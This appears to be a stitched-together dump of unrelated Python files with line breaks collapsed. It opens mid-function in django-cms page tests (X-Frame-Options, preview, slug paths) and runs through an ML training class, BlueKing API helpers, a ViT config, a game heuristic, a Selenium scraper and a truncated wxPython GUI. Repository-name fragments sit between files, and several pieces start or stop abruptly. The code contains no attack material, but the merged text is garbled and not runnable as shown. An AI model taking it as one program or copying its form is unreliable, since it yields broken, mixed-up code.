self.settings( CMS_TEMPLATES=(('placeholder_tests/base.html', 'tpl'), ), ): page = create_page('home', 'placeholder_tests/base.html', 'en', published=True, slug='home') placeholders = list(page.placeholders.all()) for i, placeholder in enumerate(placeholders): for j in range(5): add_plugin(placeholder, 'TextPlugin', 'en', body='text-%d-%d' % (i, j)) add_plugin(placeholder, 'LinkPlugin', 'en', name='link-%d-%d' % (i, j)) # trigger the apphook query so that it doesn't get in our way reverse('pages-root') # trigger the get_languages query so it doesn't get in our way context = self.get_context(page=page) context['request'].current_page.get_languages() renderer = self.get_content_renderer(context['request']) with self.assertNumQueries(4): for i, placeholder in enumerate(placeholders): content = renderer.render_page_placeholder( placeholder.slot, context, inherit=False, ) for j in range(5): self.assertIn('text-%d-%d' % (i, j), content) self.assertIn('link-%d-%d' % (i, j), content) def test_xframe_options_allow(self): """Test that no X-Frame-Options is set when page's xframe_options is set to allow""" page = create_page( title='home', template='nav_playground.html', language='en', published=True, slug='home', xframe_options=Page.X_FRAME_OPTIONS_ALLOW ) resp = self.client.get(page.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), None) def test_xframe_options_sameorigin(self): """Test that X-Frame-Options is 'SAMEORIGIN' when xframe_options is set to origin""" page = create_page( title='home', template='nav_playground.html', language='en', published=True, slug='home', xframe_options=Page.X_FRAME_OPTIONS_SAMEORIGIN ) resp = self.client.get(page.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), 'SAMEORIGIN') def test_xframe_options_deny(self): """Test that X-Frame-Options is 'DENY' when xframe_options is set to deny""" page = create_page( title='home', template='nav_playground.html', language='en', published=True, slug='home', xframe_options=Page.X_FRAME_OPTIONS_DENY ) resp = self.client.get(page.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), 'DENY') def test_xframe_options_inherit_with_parent(self): """Test that X-Frame-Options is set to parent page's setting when inherit is set""" parent = create_page( title='home', template='nav_playground.html', language='en', published=True, slug='home', xframe_options=Page.X_FRAME_OPTIONS_DENY ) child1 = create_page( title='subpage', template='nav_playground.html', language='en', published=True, slug='subpage', parent=parent, xframe_options=Page.X_FRAME_OPTIONS_INHERIT ) child2 = create_page( title='subpage', template='nav_playground.html', language='en', published=True, slug='subpage', parent=child1, xframe_options=Page.X_FRAME_OPTIONS_ALLOW ) child3 = create_page( title='subpage', template='nav_playground.html', language='en', published=True, slug='subpage', parent=child2, xframe_options=Page.X_FRAME_OPTIONS_INHERIT ) resp = self.client.get(parent.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), 'DENY') resp = self.client.get(child1.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), 'DENY') resp = self.client.get(child2.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), None) resp = self.client.get(child3.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), None) def test_top_level_page_inherited_xframe_options_are_applied(self): MIDDLEWARE = settings.MIDDLEWARE + ['django.middleware.clickjacking.XFrameOptionsMiddleware'] with self.settings(MIDDLEWARE=MIDDLEWARE): page = create_page('test page 1', 'nav_playground.html', 'en', published=True) resp = self.client.get(page.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), 'SAMEORIGIN') def test_xframe_options_with_cms_page_cache_and_clickjacking_middleware(self): # Refs: 6346 override = { 'MIDDLEWARE': settings.MIDDLEWARE + [ 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] } override['CMS_PAGE_CACHE'] = True with self.settings(**override): page = create_page( 'test page 1', 'nav_playground.html', 'en', published=True, xframe_options=Page.X_FRAME_OPTIONS_ALLOW, ) # Normal response from render_page resp = self.client.get(page.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), None) # Response from page cache resp = self.client.get(page.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), None) def test_page_used_on_request(self): """ The rendered page changes depending on request and user permissions. """ superuser = self.get_superuser() staff_with_no_permissions = self.get_staff_user_with_no_permissions() draft_text = '

text only in draft

' public_text = '

text in draft & live

' cms_page = create_page( title='home', template='nav_playground.html', language='en', published=True, slug='home', xframe_options=Page.X_FRAME_OPTIONS_DENY ) placeholder = cms_page.placeholders.all()[0] add_plugin(cms_page.placeholders.all()[0], 'TextPlugin', 'en', body=public_text) cms_page.publish('en') add_plugin(placeholder, 'TextPlugin', 'en', body=draft_text) endpoint = cms_page.get_absolute_url('en') with self.login_user_context(superuser): # staff user with change permissions # draft page is always used resp = self.client.get(endpoint) self.assertContains(resp, public_text) self.assertContains(resp, draft_text) with self.login_user_context(superuser): # staff user with change permissions # draft page is used regardless of edit resp = self.client.get(endpoint + '?edit_off') self.assertContains(resp, public_text) self.assertContains(resp, draft_text) with self.login_user_context(superuser): # staff user with change permissions # draft page is used regardless of edit resp = self.client.get(endpoint + '?toolbar_off') self.assertContains(resp, public_text) self.assertContains(resp, draft_text) with self.login_user_context(superuser): # staff user with change permissions # public page is used because of explicit ?preview resp = self.client.get(endpoint + '?preview') self.assertContains(resp, public_text) self.assertNotContains(resp, draft_text) with self.login_user_context(superuser): # staff user with change permissions # public page is used because of preview disables edit resp = self.client.get(endpoint + '?preview&edit') self.assertContains(resp, public_text) self.assertNotContains(resp, draft_text) with self.login_user_context(staff_with_no_permissions): # staff user with no change permissions # public page is always used resp = self.client.get(endpoint) self.assertContains(resp, public_text) self.assertNotContains(resp, draft_text) def test_page_preview_persists(self): """ Page preview persists in the user session to allow users to navigate the site in public mode. """ superuser = self.get_superuser() draft_text = '

text only in draft

' public_text = '

text in draft & live

' cms_page = create_page( title='home', template='nav_playground.html', language='en', published=True, slug='home', xframe_options=Page.X_FRAME_OPTIONS_DENY ) placeholder = cms_page.placeholders.all()[0] add_plugin(cms_page.placeholders.all()[0], 'TextPlugin', 'en', body=public_text) cms_page.publish('en') add_plugin(placeholder, 'TextPlugin', 'en', body=draft_text) endpoint = cms_page.get_absolute_url('en') with self.login_user_context(superuser): # staff user with change permissions # public page is used because of explicit ?preview resp = self.client.get(endpoint + '?preview') self.assertContains(resp, public_text) self.assertNotContains(resp, draft_text) resp = self.client.get(endpoint) self.assertContains(resp, public_text) self.assertNotContains(resp, draft_text) def test_translated_subpage_title_path_regeneration(self): """ When a child page is created with multiple translations before parent translation, child title translation path should be regenerated to take into account parent path. This test enforces the issues found in: https://github.com/django-cms/django-cms/issues/6622, where the slug was not regenerated. """ parent = create_page('en-parent', "nav_playground.html", 'en', slug = 'en-parent', published=True) child = create_page('en-child', "nav_playground.html", 'en', slug = 'en-child', parent=parent, published=True) create_title('de', 'de-child', child, slug='de-child') # Parent 'de' title created after child translation create_title('de', 'de-parent', parent, slug='de-parent') parent._update_title_path_recursive('de', slug='de-parent') parent.clear_cache(menu=True) parent.publish('de') child.publish('de') response = self.client.get('/de/de-parent/de-child/') self.assertEqual(response.status_code, 200) def test_subpage_title_path_regeneration_after_parent_slug_change(self): """ When a parent page slug changes, the child title path should be regenerated. This test enforces the issues found in: https://github.com/django-cms/django-cms/issues/6622, where the slug was not regenerated. """ parent = create_page('BadFoo', "nav_playground.html", 'en', slug = 'badfoo', published=True) child = create_page('Bar', "nav_playground.html", 'en', slug = 'bar', parent=parent, published=True) title = parent.get_title_obj(language='en', fallback=False) title.title='Foo' title.save() parent._update_title_path_recursive('en', slug='foo') parent.clear_cache(menu=True) parent.publish('en') child.publish('en') response = self.client.get('/en/foo/bar/') self.assertEqual(response.status_code, 200) class PageTreeTests(CMSTestCase): def test_rename_node(self): superuser = self.get_superuser() home = create_page('grandpa', 'nav_playground.html', 'en', slug='home', published=True) home.publish('en') parent = create_page('parent', 'nav_playground.html', 'en', slug='parent', published=True) parent.publish('en') child = create_page('child', 'nav_playground.html', 'en', slug='child', published=True, parent=parent) child.publish('en') endpoint = self.get_admin_url(Page, 'change', parent.pk) with self.login_user_context(superuser): response = self.client.post(endpoint, {'title': 'parent', 'slug': 'father'}) self.assertRedirects(response, self.get_admin_url(Page, 'changelist')) parent = Page.objects.get(pk=parent.pk) parent.publish('en') child = Page.objects.get(pk=child.pk) self.assertEqual(child.get_absolute_url(language='en'), '/en/father/child/') self.assertEqual(child.publisher_public.get_absolute_url(language='en'), '/en/father/child/') def test_rename_node_alters_descendants(self): superuser = self.get_superuser() create_page('grandpa', 'nav_playground.html', 'en', slug='home', published=True) parent = create_page('parent', 'nav_playground.html', 'en', slug='parent', published=True) child = create_page('child', 'nav_playground.html', 'en', slug='child', published=True, parent=parent) grandchild_1 = create_page('grandchild-1', 'nav_playground.html', 'en', slug='grandchild-1', published=True, parent=child) grandchild_2 = create_page('grandchild-2', 'nav_playground.html', 'en', slug='grandchild-2', published=True, parent=child.reload()) grandchild_3 = create_page('grandchild-3', 'nav_playground.html', 'en', slug='grandchild-3', published=True, parent=child.reload()) endpoint = self.get_admin_url(Page, 'change', parent.pk) with self.login_user_context(superuser): response = self.client.post(endpoint, {'title': 'parent', 'slug': 'father'}) self.assertRedirects(response, self.get_admin_url(Page, 'changelist')) # Draft pages self.assertEqual(grandchild_1.get_absolute_url(language='en'), '/en/father/child/grandchild-1/') self.assertEqual(grandchild_2.get_absolute_url(language='en'), '/en/father/child/grandchild-2/') self.assertEqual(grandchild_3.get_absolute_url(language='en'), '/en/father/child/grandchild-3/') parent.reload().publish('en') # Public pages self.assertEqual(grandchild_1.publisher_public.get_absolute_url(language='en'), '/en/father/child/grandchild-1/') self.assertEqual(grandchild_2.publisher_public.get_absolute_url(language='en'), '/en/father/child/grandchild-2/') self.assertEqual(grandchild_3.publisher_public.get_absolute_url(language='en'), '/en/father/child/grandchild-3/') def test_move_node(self): home = create_page('grandpa', 'nav_playground.html', 'en', slug='home', published=True) home.publish('en') parent = create_page('parent', 'nav_playground.html', 'en', slug='parent', published=True) parent.publish('en') child = create_page('child', 'nav_playground.html', 'en', slug='child', published=True, parent=home) child.publish('en') child.move_page(parent.node) child = child.reload() child.publish('en') child.reload() self.assertEqual(child.get_absolute_url(language='en'), '/en/parent/child/') self.assertEqual(child.publisher_public.get_absolute_url(language='en'), '/en/parent/child/') contador = 0 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) contador = 1 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) contador = 2 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) contador = 3 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) contador = 4 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) contador = 5 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) contador = 6 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) contador = 7 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) contador = 8 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) MauroLuzzatto/algorithmic-explanations0 # -*- coding: utf-8 -*- """ Created on Tue Nov 24 21:29:13 2020 @author: mauro """ import datetime import json import os import pickle import random import matplotlib.pyplot as plt # type: ignore import pandas as pd # type: ignore import sklearn # type: ignore from LoggerClass import LoggerClass from sklearn.base import is_classifier, is_regressor # type: ignore from sklearn.datasets import load_diabetes # type: ignore from sklearn.metrics import f1_score # type: ignore from sklearn.metrics import ( accuracy_score, mean_absolute_error, mean_absolute_percentage_error, mean_squared_error, precision_score, r2_score, ) from sklearn.model_selection import RandomizedSearchCV # type: ignore from sklearn.model_selection import train_test_split # type: ignore from sklearn.pipeline import Pipeline from sklearn.preprocessing import StandardScaler from xgboost import XGBRegressor # type: ignore from src.model.config import path_base from src.model.utils import create_folder, get_dataset class ModelClass(object): """ This class provides the funktionality to train a model using a random grid search and evaluate the results """ def __init__( self, estimator: sklearn.base.BaseEstimator, X: pd.DataFrame, y: pd.DataFrame, path_model: str, folder: str = None, ) -> None: """ Initialize the class and setup the logger and define the paths to save the results to Args: estimator (sklearn.BaseEstimator): [description] X (pd.DataFrame): [description] y (pd.DataFrame): [description] path_model (str): [description] folder (str): add a folder extension in the save folder """ self.X = X.values self.y = y.values self.column_names = list(X) self.path_model = path_model self.estimator = estimator self.save_name = estimator.__class__.__name__ self.folder = folder self.set_paths() Logger = LoggerClass() self.logger = Logger(self.path_save, stage="training") self.get_train_test_split() def set_paths(self): """ Define the neceneeded paths for saving the results """ self.time_stamp = datetime.datetime.now().strftime("%Y-%m-%d--%H-%M-%S") if self.folder: folder_name = f"{self.time_stamp} - {self.folder}" else: folder_name = self.time_stamp self.path_model = create_folder(os.path.join(self.path_model, folder_name)) self.path_save = create_folder(os.path.join(self.path_model, "results")) def get_train_test_split( self, test_size: float = 0.2, random_state: float = None ) -> None: """ Get the train and test split of the features and target values Args: test_size (float, optional): [description]. Defaults to 0.2. random_state ([type], optional): [description]. Defaults to None. """ if not random_state: random_state = random.randint(0, 1000) self.X_train, self.X_test, self.y_train, self.y_test = train_test_split( self.X, self.y, random_state=random_state, test_size=test_size ) self.logger.info(f"self.X: {self.X.shape}") self.logger.info(f"self.y: {self.y.shape}") self.logger.info(f"self.X_train: {self.X_train.shape}") self.logger.info(f"self.y_train: {self.y_train.shape}") self.logger.info(f"self.X_test: {self.X_test.shape}") self.logger.info(f"self.y_test: {self.y_test.shape}") self.logger.info(f"test_size: {test_size}") self.logger.info(f"random_state: {test_size}") self.logger.info(f"column_names: {self.column_names}") def hyperparamter_tuning( self, param_distributions: dict, cv_settings: dict ) -> None: """ Execute a random grid search using the distribution of hyperparemeter values and CV values Args: param_distributions (dict): dictionary with distribution of values per hyperparameter cv_settings (dict): dictionary CV settings """ random_search = self.build_CV_search(param_distributions, cv_settings) random_search.fit(self.X_train, self.y_train) self.get_CV_results(random_search, sort_by="rank_test_score") self.best_estimator = random_search.best_estimator_ self.best_params = random_search.best_params_ self.save_parameters(param_distributions, "param_distributions") self.save_parameters(cv_settings, "cv_settings") def save_parameters(self, variable: dict, name: str) -> None: """ Save dictionary to json using the provided name """ with open(os.path.join(self.path_save, f"{name}.json"), "w") as fp: json.dump(variable, fp) def build_pipeline(self, estimator=None): """ Build the pipeline for processing the data before model training """ return Pipeline( steps=[ ("scale", StandardScaler(with_mean=True, with_std=True)), ("estimator", estimator), ] ) def build_CV_search( self, param_distributions: dict, param_cv: dict ) -> sklearn.model_selection.RandomizedSearchCV: """ Setup the random search cross validation object Args: param_distributions (dict): [description] param_cv (dict): [description] Returns: sklearn.RandomizedSearchCV: [description] """ random_search = RandomizedSearchCV( estimator=self.estimator, param_distributions=param_distributions, n_iter=param_cv["n_iter"], scoring=param_cv["scoring"], cv=param_cv["cv"], return_train_score=False, n_jobs=param_cv["n_jobs"], verbose=param_cv["verbose"], random_state=param_cv["random_state"], ) return random_search def get_CV_results( self, random_search: sklearn.model_selection.RandomizedSearchCV, sort_by: str, ascending: bool = True, n_rows: int = 1000, ) -> None: """ Extract the results from the random search Cross Validation Args: random_search (sklearn.model_selection.RandomizedSearchCV): DESCRIPTION. sort_by (str): DESCRIPTION. ascending (bool, optional): DESCRIPTION. Defaults to True. n_rows (int, optional): DESCRIPTION. Defaults to 1000. (TYPE): DESCRIPTION. Returns: None: DESCRIPTION. """ df_results = ( pd.DataFrame(random_search.cv_results_) .sort_values(by=sort_by, ascending=ascending) .head(n_rows) ) df_results.to_csv( os.path.join(self.path_save, "cv_results.csv"), index=False, sep=";", float_format="%.3f", ) self.logger.info(f"Training score: \n{random_search.best_score_:.2f}") self.logger.info(f"Best hyperparameters: \n{random_search.best_params_}") def full_data_training(self) -> None: """ Train the model on the the full dataset and on the best hyperparameters Returns: None: DESCRIPTION. """ self.final_model = self.estimator.set_params(**self.best_params) self.final_model.fit(self.X, self.y) def evaluate(self) -> None: """ Evaluate the model with the best performing hyperparamters, use the test set to the metrics for the model Returns: None: DESCRIPTION. """ self.y_pred = self.best_estimator.predict(self.X_test) if is_regressor(self.estimator): methods = [ r2_score, mean_absolute_error, mean_squared_error, mean_absolute_percentage_error, ] else: methods = [accuracy_score, precision_score, f1_score] results = {} for method in methods: score = method(self.y_test, self.y_pred) results[method.__name__] = score self.logger.info(f"{method.__name__}: {score:.2f}") pd.DataFrame(results, index=[self.time_stamp]).to_csv( os.path.join(self.path_save, "best_score.csv"), float_format="%.2f", sep=";" ) def save_pickle(self) -> None: """ save the estimator into a pickle file Returns: None: DESCRIPTION. """ name = f"{self.save_name}.pickle" with open(os.path.join(self.path_model, name), "wb") as handle: pickle.dump(self.final_model, handle, protocol=pickle.HIGHEST_PROTOCOL) self.logger.info(f"Save: {os.path.join(self.path_model, name)}") def load_pickle(self, name: str) -> None: """ Load the estimator from a pickle file Args: name (str): DESCRIPTION. Returns: None: DESCRIPTION. """ assert name.endswith(".pickle") with open(os.path.join(self.path_model, name), "rb") as handle: estimator = pickle.load(handle) self.logger.info(f"Load: {os.path.join(self.path_model, name)}") return estimator def visualize(self, image_name: str = "results.png"): """ plot the predictions versus the true values Args: image_name (str, optional): DESCRIPTION. Defaults to "results.png". Returns: None. """ fig = plt.figure(figsize=(4, 5)) # Plot Real vs Predict plt.scatter(self.y_pred, self.y_test, alpha=0.5) plt.xlabel("y_pred") plt.ylabel("y_test") plt.show(block=False) fig.savefig(os.path.join(self.path_save, image_name)) def save_config(self, config): """ save the configurations of the dataset Args: config (TYPE): DESCRIPTION. Returns: None. """ with open( os.path.join(self.path_save, "config.json"), "w", encoding="utf-8" ) as f: json.dump(config, f, ensure_ascii=False, indent=4) def train(self, param_distributions, cv_settings, config): """ wrapper function to execute the full training process end-to-end, including hyperparameter tuning, evaluation, visualization and model saving Args: param_distributions (TYPE): DESCRIPTION. cv_settings (TYPE): DESCRIPTION. config (TYPE): DESCRIPTION. Returns: None. """ self.hyperparamter_tuning(param_distributions, cv_settings) self.evaluate() self.visualize() self.full_data_training() self.save_pickle() self.save_config(config) param_distributions = { "learning_rate": [0.001, 0.01, 0.05, 0.1, 0.25, 0.5], "max_depth": [3, 5, 7, 9], "min_child_weight": [1, 3, 5, 10], "subsample": [0.5, 0.7, 0.8, 1.0], "colsample_bytree": [0.25, 0.5, 0.7, 1.0], "n_estimators": [100, 200], "objective": ["reg:squarederror"], } cv_settings = { "n_iter": 400, # total combinations testes "scoring": "r2", "cv": 4, "random_state": 0, "n_jobs": -1, "verbose": 3, } if __name__ == "__main__": path_load = os.path.join(path_base, r"dataset", "training") path_model = os.path.join(path_base, r"model") name = "training_data_v2.csv" source = "training" if source == "demo": diabetes = load_diabetes() X = diabetes.data y = diabetes.target elif source == "training": X, y = get_dataset( path_load=path_load, name=name, ) else: raise estimator = XGBRegressor() config = {"target": list(y)[0], "features": list(X)} model = ModelClass(estimator, X, y, path_model) model.train(param_distributions, cv_settings, config) Chace-wang/bk-nodemancommon/api/domains.py # -*- coding: utf-8 -*- """ TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-节点管理(BlueKing-BK-NODEMAN) available. Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import os from django.conf import settings ESB_PREFIX_V2 = os.getenv("ESB_PREFIX_V2") or "/api/c/compapi/v2/" def gen_api_root(api_gw_env_key: str, suffix: str) -> str: """生成API根路径,首先从环境变量获取,若环境变量没有,则按默认规则拼接""" api_gw_env_val = os.getenv(api_gw_env_key) if api_gw_env_val: return api_gw_env_val api_root = f"{settings.BK_COMPONENT_API_URL}/{ESB_PREFIX_V2}/{suffix}/" if api_root.startswith("http://"): api_root = api_root[:7] + api_root[7:].replace("//", "/") elif api_root.startswith("https://"): api_root = api_root[:8] + api_root[8:].replace("//", "/") else: api_root = api_root.replace("//", "/") return api_root # 蓝鲸平台模块域名 CC_APIGATEWAY_ROOT_V2 = gen_api_root("BKAPP_BK_CC_APIGATEWAY", "cc") GSE_APIGATEWAY_ROOT_V2 = gen_api_root("BKAPP_BK_GSE_APIGATEWAY", "gse") ESB_APIGATEWAY_ROOT_V2 = gen_api_root("BKAPP_BK_ESB_APIGATEWAY", "esb") JOB_APIGATEWAY_ROOT_V3 = gen_api_root("BKAPP_BK_JOB_APIGATEWAY", "jobv3") BK_NODE_APIGATEWAY_ROOT = gen_api_root("BKAPP_BK_NODE_APIGATEWAY", "nodeman") # coding=utf-8 # Copyright 2022 The Uncertainty Baselines Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # pylint: disable=line-too-long r"""Finetune a ViT-L/32 heteroscedastic model on Imagenet. """ # pylint: enable=line-too-long import ml_collections import sweep_utils # local file import from baselines.jft.experiments def get_sweep(hyper): """Few-shot sweep.""" imagenet_1shot_sweep = hyper.product([ hyper.chainit([ hyper.product(sweep_utils.imagenet_fewshot( hyper, fewshot='1shot', steps=200, warmup=s)) for s in [1, 5, 10]]), hyper.sweep('config.lr.base', [0.04, 0.03, 0.02]), hyper.sweep('config.model.temperature', [0.25, 0.5, 0.75, 1.0, 2.0, 3.0]) ]) imagenet_5shot_sweep = hyper.product([ hyper.chainit([ hyper.product(sweep_utils.imagenet_fewshot( hyper, fewshot='5shot', steps=1000, warmup=s)) for s in [1, 10, 20, 30]]), hyper.sweep('config.lr.base', [0.05, 0.04, 0.03]), hyper.sweep('config.model.temperature', [0.25, 0.5, 0.75, 1.0, 2.0, 3.0]) ]) imagenet_10shot_sweep = hyper.product([ hyper.chainit([ hyper.product(sweep_utils.imagenet_fewshot( hyper, fewshot='10shot', steps=2000, warmup=s)) for s in [30, 40, 50]]), hyper.sweep('config.lr.base', [0.06, 0.05, 0.03]), hyper.sweep('config.model.temperature', [0.25, 0.5, 0.75, 1.0, 2.0, 3.0]) ]) return hyper.product([ hyper.chainit([ imagenet_1shot_sweep, imagenet_5shot_sweep, imagenet_10shot_sweep ]), ]) # def get_sweep(hyper): # return hyper.product([ # hyper.sweep('config.total_steps', [20_000, 30_000, 40_000]), # hyper.sweep('config.lr.base', [0.06, 0.03, 0.01]), # hyper.sweep('config.model.temperature', [0.15, 0.25, 0.5, 0.75]), # ]) def get_config(): """Config for training a patch-transformer on JFT.""" config = ml_collections.ConfigDict() # Fine-tuning dataset config.dataset = 'imagenet2012' config.train_split = 'train[:99%]' config.val_split = 'train[99%:]' config.test_split = 'validation' config.num_classes = 1000 # OOD eval # ood_split is the data split for both the ood_dataset and the dataset. config.ood_datasets = [] config.ood_num_classes = [] config.ood_split = '' config.ood_methods = [] config.pp_eval_ood = [] BATCH_SIZE = 512 # pylint: disable=invalid-name config.batch_size = BATCH_SIZE config.batch_size_eval = BATCH_SIZE config.val_cache = False config.total_steps = 40_000 INPUT_RES = 384 # pylint: disable=invalid-name common = '|value_range(-1, 1)' common += '|onehot(1000, key="label", key_result="labels")' common += '|keep(["image", "labels"])' pp_train = f'decode_jpeg_and_inception_crop({INPUT_RES})|flip_lr' config.pp_train = pp_train + common config.pp_eval = f'decode|resize({INPUT_RES})' + common # CIFAR-10H eval config.eval_on_cifar_10h = False config.pp_eval_cifar_10h = '' # Imagenet ReaL eval config.eval_on_imagenet_real = True config.pp_eval_imagenet_real = f'decode|resize({INPUT_RES})|value_range(-1, 1)|keep(["image", "labels"])' # pylint: disable=line-too-long config.shuffle_buffer_size = 50_000 # Per host, so small-ish is ok. config.log_training_steps = 2000 config.log_eval_steps = 5000 config.checkpoint_steps = 10000 config.checkpoint_timeout = 1 config.prefetch_to_device = 2 config.trial = 0 # Model section # pre-trained model ckpt file # !!! The below section should be modified per experiment config.model_init = '/path/to/pretrained_model_ckpt.npz' # Model definition to be copied from the pre-training config config.model = ml_collections.ConfigDict() config.model.patches = ml_collections.ConfigDict() config.model.patches.size = [32, 32] config.model.hidden_size = 1024 config.model.transformer = ml_collections.ConfigDict() config.model.transformer.attention_dropout_rate = 0. config.model.transformer.dropout_rate = 0. config.model.transformer.mlp_dim = 4096 config.model.transformer.num_heads = 16 config.model.transformer.num_layers = 24 config.model.classifier = 'token' # Or 'gap' config.model.fix_base_model = False # This is "no head" fine-tuning, which we use by default config.model.representation_size = None # set reint_head = False to re-use the head parameters of the upstream model config.reint_head = True # Heteroscedastic config.model.multiclass = True config.model.temperature = 3.0 config.model.mc_samples = 5000 config.model.num_factors = 0 config.model.param_efficient = False config.model.return_locs = False # True -> fine-tune a homoscedastic model # Optimizer section config.optim_name = 'Momentum' config.optim = ml_collections.ConfigDict() config.grad_clip_norm = 1.0 config.weight_decay = None # No explicit weight decay config.loss = 'softmax_xent' # or 'sigmoid_xent' config.lr = ml_collections.ConfigDict() config.lr.base = 0.003 config.lr.warmup_steps = 500 config.lr.decay_type = 'cosine' return config 1-10 import numpy as np from gym_splendor_code.envs.mechanics.action_space_generator import generate_all_legal_actions from gym_splendor_code.envs.mechanics.game_settings import POINTS_TO_WIN from gym_splendor_code.envs.mechanics.state import State VALUE_IF_NO_LEGAL_ACTIONS = -1 class StateEvaluatorHeuristic: def __init__(self, weight: list = [100,2,2,1,0.1]): self.weight = weight self.normalize_weight() def normalize_weight(self): if np.linalg.norm(self.weight) > 0: self.weight = self.weight/np.linalg.norm(self.weight) def evaluate(self, state_to_eval): current_points = state_to_eval.active_players_hand().number_of_my_points() legal_actions = generate_all_legal_actions(state_to_eval) if len(legal_actions): points = [] for action in legal_actions: ae = action.evaluate(state_to_eval) potential_reward = (np.floor((current_points + ae["card"][2])/POINTS_TO_WIN) * self.weight[0] +\ self.weight[1] * ae["card"][2] + self.weight[2] *ae["nobles"] +\ self.weight[3] * ae["card"][0] + self.weight[4] * sum(ae["gems_flow"])) points.append(potential_reward) return max(points) else: return VALUE_IF_NO_LEGAL_ACTIONS#!/bin/env python3 # -*- coding: UTF-8 -*- ''' Created on 2016/09/03 @author: nkasai ''' import sys import argparse from abc import ABCMeta, abstractmethod from selenium import webdriver from pyquery import PyQuery as pq from selenium.webdriver.common.desired_capabilities import DesiredCapabilities # # settings # USER_AGNET = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36' class ScrapingBase(object, metaclass=ABCMeta): ''' ScrapingBase ''' def __init__(self, *args, **kwargs): ''' Constructor ''' self.url = kwargs['url'] print('url :{}'.format(self.url)) dcap = dict(DesiredCapabilities.PHANTOMJS) dcap['phantomjs.page.settings.userAgent'] = (USER_AGNET) self.browser = webdriver.PhantomJS(desired_capabilities=dcap) def get(self): """ get """ self.browser.get(self.url) source = self.browser.page_source.encode('utf-8') #print('source :{}'.format(source)) parsed = self._parse(source) #print('parsed :{}'.format(parsed)) obj = self._extract(parsed) #print('obj : {}'.format(obj)) self._register(obj) def _parse(self, source, *args, **kwargs): """ _parse """ return pq(source) @abstractmethod def _extract(self, parsed, *args, **kwargs): """ _extract """ ret = [] return ret @abstractmethod def _register(self, obj, *args, **kwargs): """ _register """ pass class MyScraping(ScrapingBase): ''' MyScraping ''' def _extract(self, parsed, *args, **kwargs): """ _extract """ ret = [] # # example # obj_emphasis = parsed('ul.emphasis') #print('obj_emphasis : {}'.format(obj_emphasis)) for o in obj_emphasis('li'): ret.append(pq(o).text()) #print('_extract() : {}'.format(ret)) return ret def _register(self, obj, *args, **kwargs): """ _register """ for o in obj: print(o) def main(args): """ main """ ret = 0 try: rc = MyScraping( url=args.url ) rc.get() except Exception as e: print(e.__class__.__name__) print(e) ret = 1 return ret if __name__ == '__main__': parser = argparse.ArgumentParser(description='scraping sample.') parser.add_argument('--url', required=True) args = parser.parse_args() result = main(args) sys.exit(result) def fourthPower(x): ''' x: int or float. ''' result = square(x) * square(x) return result # -*- coding: utf-8 -*- ########################################################################### ## Python code generated with wxFormBuilder (version Jun 17 2015) ## http://www.wxformbuilder.org/ ## ## PLEASE DO "NOT" EDIT THIS FILE! ########################################################################### import wx import wx.xrc ########################################################################### ## Class MyFrame1 ########################################################################### class MyFrame1 ( wx.Frame ): def __init__( self, parent ): wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = wx.EmptyString, pos = wx.DefaultPosition, size = wx.Size( 970,608 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) bSizer2 = wx.BoxSizer( wx.VERTICAL ) gbSizer2 = wx.GridBagSizer( 0, 0 ) gbSizer2.SetFlexibleDirection( wx.BOTH ) gbSizer2.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText3 = wx.StaticText( self, wx.ID_ANY, u"胆码十", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText3.Wrap( -1 ) self.m_staticText3.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_HIGHLIGHT ) ) gbSizer2.Add( self.m_staticText3, wx.GBPosition( 0, 0 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox15 = wx.CheckBox( self, wx.ID_ANY, u"0", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox15, wx.GBPosition( 0, 1 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox16 = wx.CheckBox( self, wx.ID_ANY, u"1", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox16, wx.GBPosition( 0, 2 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) 